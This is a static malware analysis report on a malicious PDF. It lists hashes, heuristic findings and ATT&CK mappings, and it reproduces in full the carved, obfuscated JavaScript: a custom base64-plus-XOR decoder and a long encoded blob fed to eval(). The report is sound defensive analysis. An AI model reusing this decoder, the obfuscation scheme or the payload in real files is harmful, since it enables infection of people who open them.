Malicious PDF — malware analysis report

Static analysis result for SHA-256 eac8211b5b3887f5…

MALICIOUS

PDF

9.6 KB Created: 2008-07-26 19:43:58 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5c14f5fe77ca0f066f200b258d22acb2 SHA-1: 9e05cec3ff2f9c74fd0f52dd7fac9c973ae9cf0c SHA-256: eac8211b5b3887f5e30f5903bd2bb513a89d0bdcf6a52fed8a3eec2d3f745fef
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

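The PDF file contains embedded JavaScript with multiple obfuscation indicators, including eval() calls and string concatenation. The heuristic 'EXTRACTED_FILE_STATIC_TRIAGE' flags a long encoded blob and script obfuscation. The JavaScript is likely designed to download and execute a second-stage payload; the static evidence shown in this report establishes only that the script decodes the embedded blob and passes the result to eval(), so the download behaviour is an inference that still needs confirmation by decoding the blob or by dynamic analysis. Likewise, the extracted script is JavaScript and no PowerShell is visible in it while the blob remains encoded, so the T1059.001 mapping is not corroborated by the artifacts shown here. The document body itself contains no readable content to provide further context.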

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    for(QgO1WUA64=Math[UOxr6A8T8+       ""+ "c" + "" +""+UOxr6A8T8+VlBDs0IKCD  +UOxr6A8T8+     ""+"i"+UOxr6A8T8 +"l" + ""       +""](VZZ9On/UvfnowhISU);QgO1WUA64>YoA42IkZOOr;QgO1WUA64--)
    {mY4mZpMhzei = "j5lbLfVZ";for(eval(""    + UOxr6A8T8+""  +"sGRWBW="+"" +  "M"+UOxr6A8T8+  "a"+UOxr6A8T8+   "t"+UOxr6A8T8+    "h"+XV3au+XV3au+"."+UOxr6A8T8+f8dGsF+UOxr6A8T8+"i"+UOxr6A8T8+"n(VZZ9On,UvfnowhISU)");sGRWBW>YoA42IkZOOr;sGRWBW--,VZZ9On--){hOQjOihfRC9hX7|=(j58XDgq[UOxr6A8T8+El4Mv6KJAYVp[ XV3au+   ""+""+"c"+XV3au+"h"+XV3au+"a"+XV3au+"r"+XV3au+"C"+XV3au+"o"+XV3au+"d"+XV3au+VlBDs0IKCD+XV3au+"A"+XV3au+"t"](mn1HyHjUSFLxw++)-48])<<bTF0ZIS40B5was;
    if(bTF0ZIS40B5was){aqi1mOoaL+=KPhCFNwGFl(70^hOQjOihfRC9hX7&255);hOQjOihfRC9hX7>>=5+3;bTF0ZIS40B5was-=3-1;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x336 8248 bytes
SHA-256: 15b109bbe96afa13b0326cc9c9174eee7d636c9fdd6669d07ef650c129667100
Detection
ClamAV: No threats found
Obfuscation or payload: likely
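Carved artifact contains 2 eval/decoder/string-building token(s). 70 of 107 identifiers look randomly generated (e.g. 'A1BpGaArLawatah0nYAbw9QaxKlp25tzoI25xRi8') — consistent with name-mangling obfuscation. Note that this example string occurs inside the encoded string literal in the preview below rather than as a declared name, so the identifier count appears to include fragments of the blob. Carved artifact contains 1 long base64-like blob(s).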
Preview script
First 1,000 lines of the extracted script
// Analyst notes: string fragments used by the obfuscation layer.
// Left byte-identical on purpose: the carved file is identified by hash in the
// report, and the decoded layer is eval()'d and may refer to these globals by name.

// Assigned this same constant again inside EsGuUVn; never read in the code shown.
// Whether the eval()'d layer reads it cannot be told from the listing.
var mY4mZpMhzei = "j5lbLfVZ";
// Single letters that are spliced into method names assembled at run time.
var f8dGsF = "m";
var VlBDs0IKCD = "e";
// Two empty strings. They are inserted between the pieces of every assembled
// name; they contribute nothing to the result and only break up the literals.
var XV3au =   "",UOxr6A8T8="";

var Ex5R4u =       ""+  "f";
// Evaluates to the string "fromCharCode" ("f"+"r"+"o"+"m"+"C"+"h"+"a"+"r"+"C"+"o"+"d"+"e").
// The method name never appears as one literal, so a signature matching the
// plain name does not hit; the bracket-access-plus-concatenation shape is the
// stable indicator here.
var NcVRBZElObTO = Ex5R4u+  ""+XV3au+     ""+"r"    +""+XV3au+ ""+   "o" +XV3au+ ""+""+ f8dGsF  +  XV3au+    ""+    ""    +  "C" +XV3au+"h"+XV3au+""+ "a"+XV3au+   ""+    "r"+XV3au+"C"  +    "" +XV3au+"o"+XV3au+"d" +  "" +XV3au+VlBDs0IKCD +   "";


/**
 * Analyst note: wrapper around String.fromCharCode.
 *
 * NcVRBZElObTO holds the run-time-assembled string "fromCharCode", so the
 * bracket access resolves to String.fromCharCode. The trailing +"" is a no-op
 * on a value that is already a string.
 *
 * @param OSg5YbB4D1D numeric character code
 * @returns the one-character string for that code
 */
function KPhCFNwGFl(OSg5YbB4D1D){
return String[NcVRBZElObTO ](OSg5YbB4D1D) +"";

}


/**
 * Analyst note: decoder for the embedded blob.
 *
 * Takes the encoded string, maps each character through a lookup table to a
 * value of at most 63, packs four such values into three bytes, XORs each byte
 * with 70 and appends it to the output string. The scheme is base64-like with
 * a custom alphabet plus a single-byte XOR.
 *
 * The code is left byte-identical: the inner loop calls eval() on a string
 * that names local variables as text, so renaming any local would change
 * behaviour.
 *
 * @param El4Mv6KJAYVp encoded string
 * @returns decoded string (the caller passes it to eval())
 */
function EsGuUVn(El4Mv6KJAYVp){
mY4mZpMhzei = "j5lbLfVZ";
// YoA42IkZOOr     constant 0, used as the loop bound and as the initial value below
// VZZ9On          characters still to process (starts at the input length)
// UvfnowhISU      chunk size, 1018+6 = 1024
// sGRWBW          characters left in the current chunk (set through eval below)
// QgO1WUA64       chunk counter
// aqi1mOoaL       decoded output
// mn1HyHjUSFLxw   read index into the input
// bTF0ZIS40B5was  current bit offset: 0, 6, 4, 2, then 0 again
// hOQjOihfRC9hX7  bit accumulator
// j58XDgq         75-entry table indexed by (character code - 48), i.e. '0' through 'z'
var YoA42IkZOOr=0,
VZZ9On=El4Mv6KJAYVp.length,UvfnowhISU=1018+6,sGRWBW,
QgO1WUA64,aqi1mOoaL=   "",mn1HyHjUSFLxw=YoA42IkZOOr,bTF0ZIS40B5was=YoA42IkZOOr,hOQjOihfRC9hX7=YoA42IkZOOr,j58XDgq=Array(63,6,24,44,31,51,7,1,53,3,0,0,0,0,0,0,38,25,12,40,55,22,52,16,23,54,37,19,0,5,2,47,4,10,32,14,36,49,57,41,61,34,50,0,0,0,0,56,0,35,59,45,62,43,33,42,11,29,21,60,9,58,28,17,39,15,48,27,8,26,30,13,20,18,46);




// Outer loop: Math["ceil"](length / 1024) iterations, one per chunk.
for(QgO1WUA64=Math[UOxr6A8T8+       ""+ "c" + "" +""+UOxr6A8T8+VlBDs0IKCD  +UOxr6A8T8+     ""+"i"+UOxr6A8T8 +"l" + ""       +""](VZZ9On/UvfnowhISU);QgO1WUA64>YoA42IkZOOr;QgO1WUA64--)
// Inner loop: the initialiser eval()s the assembled text
// "sGRWBW=Math.min(VZZ9On,UvfnowhISU)". Each pass reads one character via the
// assembled name "charCodeAt", looks up table[code - 48] and ORs the value
// into the accumulator at the current bit offset.
{mY4mZpMhzei = "j5lbLfVZ";for(eval(""    + UOxr6A8T8+""  +"sGRWBW="+"" +  "M"+UOxr6A8T8+  "a"+UOxr6A8T8+   "t"+UOxr6A8T8+    "h"+XV3au+XV3au+"."+UOxr6A8T8+f8dGsF+UOxr6A8T8+"i"+UOxr6A8T8+"n(VZZ9On,UvfnowhISU)");sGRWBW>YoA42IkZOOr;sGRWBW--,VZZ9On--){hOQjOihfRC9hX7|=(j58XDgq[UOxr6A8T8+El4Mv6KJAYVp[ XV3au+   ""+""+"c"+XV3au+"h"+XV3au+"a"+XV3au+"r"+XV3au+"C"+XV3au+"o"+XV3au+"d"+XV3au+VlBDs0IKCD+XV3au+"A"+XV3au+"t"](mn1HyHjUSFLxw++)-48])<<bTF0ZIS40B5was;
// Non-zero offset: emit one byte. & binds tighter than ^, so the byte is
// 70 ^ (accumulator & 255). Then drop 8 bits (5+3) and lower the offset by 2 (3-1).
if(bTF0ZIS40B5was){aqi1mOoaL+=KPhCFNwGFl(70^hOQjOihfRC9hX7&255);hOQjOihfRC9hX7>>=5+3;bTF0ZIS40B5was-=3-1;
// The else branch (offset reset to 4+2 = 6), the closing braces and the return
// follow on the next line, which also carries the encoded argument and the final eval().
}else{bTF0ZIS40B5was=4+2;}}}return(aqi1mOoaL);}var Z1rowRhTN6u8=EsGuUVn(UOxr6A8T8+    ""  +"B75lF2IlFG5q@cpACByB@iLwFnZqzXE4B7ZBCxYBOTNQ@7ZhdTUhZ_IqpGKwIC@AgBNQOUxq@UFKU_ZhgBYAzX5lFxawCWZtCPYBzr1imWZtCkEq0nNw82aAccpA0nNw82K4b21KqX5lFxaw@cpA0nNw829u8B9l8t9wORytzApugBNQWoDsXUFKFBYB5G9Q@X5lFxawXA1KbkPKq75lF21BaGKwOTNQ@cpAp2awC75haP5tFLUtFx5hWRy4BXNt@V1BaGKwOTNQ@fpAdX@AB89Kq75lF2@wpkaQWnYt@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_DnPBIBLLr7FwIBLLLLLBIBM2HiFwIBLPp4PBIB6BLLFwIBP_pnLBIBFwLn5wIBUV6n5wIBr7D7PBIBr7D4dwIB8jD7PBIBP_H7IwIBrl6nDwIBIApiIwIBrVDnIwIBrVDnZwIBrwHnFwIBFlHi5wIBrXDiMBIB5AHnZwIB5jDnZwIB6nL7dwIBIlLLMBIBLLGnMBIBIlDn5wIBL_p4PBIBMtp48wIBP2piMBIBdiLnMBIB0VDLIwIBrVDnIwIBrwLnLBIBrl6i9BIBUw6ndwIBrjGnFwIB5l6nNBIBdwL7dwIBIwRn9BIBLLrLMBIBIlDn5wIB5AD48wIBM2Hi8wIB5ADnIwIBdornrwIBIlDn5wIBMGp48wIBdjHnLBIBZjG7FwIB5ADnFwIB8767dwIBF7ri6BIBLLGnIwIBIlDn5wIB5MDnPBIBP_DnrwIBLBr4dwIBIwR46BIB5w6LLBIBriRiZwIBLLRiIwIBrVpLUwIBUlHnZwIB8iGnIwIBF7LiLBIBri6nPBIBrX6n9BIBri6nFwIBrX6nMBIBrX6i9BIBr76n9BIBF7LnLBIBUAHn8wIBF7LnMBIBF7Ln5wIBrlLn0wIBFwLnUwIBrVHnIwIB87GnIwIBriHnIwIBrw6nUwIB8jHiNBIBUAHiLBIBrM6nDwIB8lLn5wIBIAHi5oIsXUFKCTYw@cpA5RZt8xZlIBYsTwIBIiRi6BIBIiRi6BIBIiRi6BIBIiRi6GIsBXThanYwTCyQJFYAbA1QW2aAcA@wpkaQWnYtXUFKTkytTCyQJFYAbAIBCBywJnYwa_1Aawai62D7awai62D7TXE4BXThanYtaGKwOr5t@cpAFAH4BXxwIG5l02Iv@VZtptZtFx5hkByszBZlIGYQWxyhCWZtCPYBzF6KqMahOCZt@V1lOPNlgTylcR@QaRytZ_Yv829wpk5s@oZhfGYQWxyhcc6lOPNlgTylcF6Kq7ZhgCNlgTylc2Iv@oZhfGYQWxyhCj5BTxaBFkNQf_@igAEwIG5l0kE4BXPlgTylc2Iv@oZhfGYQWxyhCj5BTxaBFkNQf_@igA1lOPNlgTylcR@QaRytZ_Zu829wpk5sXUFKU_ZhgBYsTCyQJFNugBNQftahcjawFnZq@WpAIVanIApiIX@ATCyQJFYAbA1lgTylcF1lgTylcF1tOCYQTCyQJFy4BXFQa3YAbA1QaPaA6G9wpkasO86K@7yQF2@sO3piXXYvDlpiI8Dhc8Is@cZteFUhs2Iv@oYQWxyh@8@AzBZlIGYQWxyhXUFKrnNw@fZBe2Iv@XFiFXD40XD40XD40XD40XD40XD40Vp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp
4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4d86KqwaBOCNuIG5hCt9tzoI2ZwpiIA6tTW1Q53ZsXUFSBUFhR2@srBNw8kyQC2@v@VDsB89Kq75lF2IlYtyhc2Iv@w9QaxKlp25tzoI25xRi8jD25_67rlD25xpiZAD252H7UVD25tpidor25_67Ijr25nH7UAD25_676tr252p45VD252D49Gr25tpidor25_pL8lD25PH7ZAD25Bp4dor25LD78jr25BD7ZlD25BLiNnD25BLiFor25BG7dor25t6L9Gr25B6i5ir25Br7djD25_D457D252pn5wD25BHn57D25PHidor25_678jr25xHiUlD252HiUVD25B6nLxD25P6ndor252HiFAD25xHiLxD25tD4MkD25tDi5AD25xHi6tr25x6nLLr25GrLI7r252HiDlD25LLi8VD252p4UlD25xLLMnD252HiIlr25tpiLnr25BLL9Gr25x675VD25PDnL_D25BDL9BD25t6ndor252HiFlD25L6nMxD252H7dor25_67ZVD25nH757D25tGiIjD252pndor252Hidir25B6LMxD25Bpi5wr25_pLMxD252p4Ulr25B6i5MD25xHiP_D25_D7Mnr25BR45or25LLL6GD25LLLLLr25xRi8oD25LGndor25nrLLGD25GR4Z7r25GDLrwD25Pp4rwD25L6n6Gr25L6n0VD25xHi6Gr25GR4M2D25LpnriD252piIAD25Lp45AD25Lp45lD25LDnUoD25Gpn8wD25LD4Djr25BpiUlD25BHi5lD25nr7P_D252pLLxr25LLLUjr252pn5wD25LR4dor25xRndjD25GRiIjr25_D7rjr25kp492D25Lp45AD25LDLr7r25LpnFwr25PDnrVD25LH7UoD25Bpnrlr25_DLP_D252DLZwr25LLL9xr252pn5wD25Bpi0jD25xRi8jD25Bpi5AD25_6757D252pn5wD25xLidjD25_HiU7r25tH7MGD25Bpi5oD25x6nP_D25G6LDir25LLLUAD252pn5wD25BHn5or25GR457D25LrL0VD252DLdir25BDnLLr25LD7IlD25LLLIAD25Lp4NPD25PpnUlD25xD7UAD25G6LF7r25LDiror25LD4rwr25LDiroD25LD4rjr25LD4Fwr25L6nrwr25G6Lr7r25PpiUjD25G6Lrjr25G6LrwD25LpLrXD25GDLrMD25Lp4UAD25x6LUAD25LDiUAD25LDnrMD25xHi8lr25Ppi87r25LHnriD25xpLrwD252pi8w6AO86Kq75lF2IQa3y1pG9wpkaAbA1QaPaA6G9wpkasO86Kq75lF2ElJ2Iv@ApqIjYiJ2HlIjy4BXPBpGaAptYtF2Iv@ApqZApiIApiXUFKrnNw@jKlACZtC2Iv@iYtYFyhCWZtCPYBz21s@oH4BXPBpGaAgBNQ@cpAptYtF2Iu@VEwJTfQaRysIVKidXE4BXPBpGaA0nNw82aAbAIBCBywJnYwa_1Aaw54IXpiaw54IXpiTXE4BXFqpGKwI2Iv@7ZhdTUhZ_IqpGKwIC@AgBNQO86Kq75lF2ElWB9QZGpAbA@sJxYAeA@idtpiIApiIXEuptYtFF6KRTNw@V1BpGaAJTZBCt5vI8HlWB9QZCHlWB9QZGH4JTZBCtKscX1KXrTA@A@AeBZQAnNwFnZqixyQ5RYBs2Iv@X5lFxaw@8@AptYtcFy4Bc9Kq75lF2EQrBNwRCyQU2Iv@w9QaxKlp25tzoI252HlIjZ252HlIjNAO86KqMahOCZtzJNBaG9tgTyBCWZtCPYBz2@v@lpn0w6iOAEQrBNwRCyQU2EsbAE
QrBNwRCyQUF6KqlahOx9uJTYQgnNljtKQFBYAbAE7WCYQpGNuJTYQgBylZBrQpkYQqRNtW_Eq8B9l3rpATo@uexKtkAEQrBNwRCyQU35sXUFSBUFhR2@srBNw8kyQC2@v@X6uDXIKBXxqBXNt@VIlI29uYTylCjGQgCZlTREtat59JTNQO89K@A@A@A1BpGaArLawatah0nYAbw9QaxKlp25tzoI25xRi8jD25_67rlD25xpiZAD252H7UVD25tpidor25_67Ijr25nH7UAD25_676tr252p45VD252D49Gr25tpidor25_pL8lD25PH7ZAD25Bp4dor25LD78jr25BD7ZlD25BLiNnD25BLiFor25BG7dor25t6L9Gr25B6i5ir25Br7djD25_D457D252pn5wD25BHn57D25PHidor25_678jr25xHiUlD252HiUVD25B6nLxD25P6ndor252HiFAD25xHiLxD25tD4MkD25tDi5AD25xHi6tr25x6nLLr25GrLI7r252HiDlD25LLi8VD252p4UlD25xLLMnD252HiIlr25tpiLnr25BLL9Gr25x675VD25PDnL_D25BDL9BD25t6ndor252HiFlD25L6nMxD252H7dor25_67ZVD25nH757D25tGiIjD252pndor252Hidir25B6LMxD25Bpi5wr25_pLMxD252p4Ulr25B6i5MD25xHiP_D25_D7Mnr25BR45or25LLL6GD25LLLLLr25xRi8oD25LGndor25nrLLGD25GR4Z7r25GDLrwD25Pp4rwD25L6n6Gr25L6n0VD25xHi6Gr25GR4M2D25LpnriD252piIAD25Lp45AD25Lp45lD25LDnUoD25Gpn8wD25LD4Djr25BpiUlD25BHi5lD25nr7P_D252pLLxr25LLLUjr252pn5wD25LR4dor25xRndjD25GRiIjr25_D7rjr25kp492D25Lp45AD25LDLr7r25LpnFwr25PDnrVD25LH7UoD25Bpnrlr25_DLP_D252DLZwr25LLL9xr252pn5wD25Bpi0jD25xRi8jD25Bpi5AD25_6757D252pn5wD25xLidjD25_HiU7r25tH7MGD25Bpi5oD25x6nP_D25G6LDir25LLLUAD252pn5wD25BHn5or25GR457D25LrL0VD252DLdir25BDnLLr25LD7IlD25LLLIAD25Lp4NPD25PpnUlD25xD7UAD25G6LF7r25LDiror25LD4rwr25LDiroD25LD4rjr25LD4Fwr25L6nrwr25G6Lr7r25PpiUjD25G6Lrjr25G6LrwD25LpLrXD25GDLrMD25Lp4UAD25x6LUAD25LDiUAD25LDnrMD25xHi8lr25Ppi87r25LHnriD25xpLrwD252pi8w6AO86KqA1BpGaAzPUw5ApiMRRAbA1Br25tZ_ZqpR@QaRytZ_YA3A1iXUFK@75lF2@QaRYAbA@idtpiIApiIAIu@V@hon5nIAH7t2Es@Apq8VDsXUFK@75lF2IqpGKwI2Iv@w9QaxKlp25tzoI25kpi0AD25kpi0A6AO86KqAIqpGKwI2Iv@7ZhdTUhZ_IqpGKwIC@AgBNQO86KqA1BpGaAIBD73FLn57YAbA@sIVaiJ2HlIjYiJ2Iu@ApqZApiIApiOAEu@ApqZApiIApiXUTA@A@A@7yQF2@srnNw@75wJnfL07Dq@cpAI8pArnKlHtr4rXaAmA@w5iLhwLDnRFpArnKlHtr4rXaAc8@AO89K@A@A@AIlFG5qiL5wJnfL07Dqs2Iv@X5lFxaw@8@ArLawatah0ny4brTA@A@A@75lF2@BK3RhtGyLU2Iv@w9QaxKlp25tzoI2IX6AO86K@A@A@AEBzkYQa2@sZBUNzRLl7P9ugBNQftah@WpAIVanIApiOl5Ph_NNTPGB@8Iv@l5Ph_NNTPGBXUTA@A@A@l5Ph_NNTPGB@cpATfLuTAEs@l5Ph_N
NTPGBXUFK@iYwIR@tWxNuMTYQgnNlCMZtZkGlWRYsZBUNzRLl7P5sXUFKbrFKbL"+""  +"" +    "");eval(Z1rowRhTN6u8);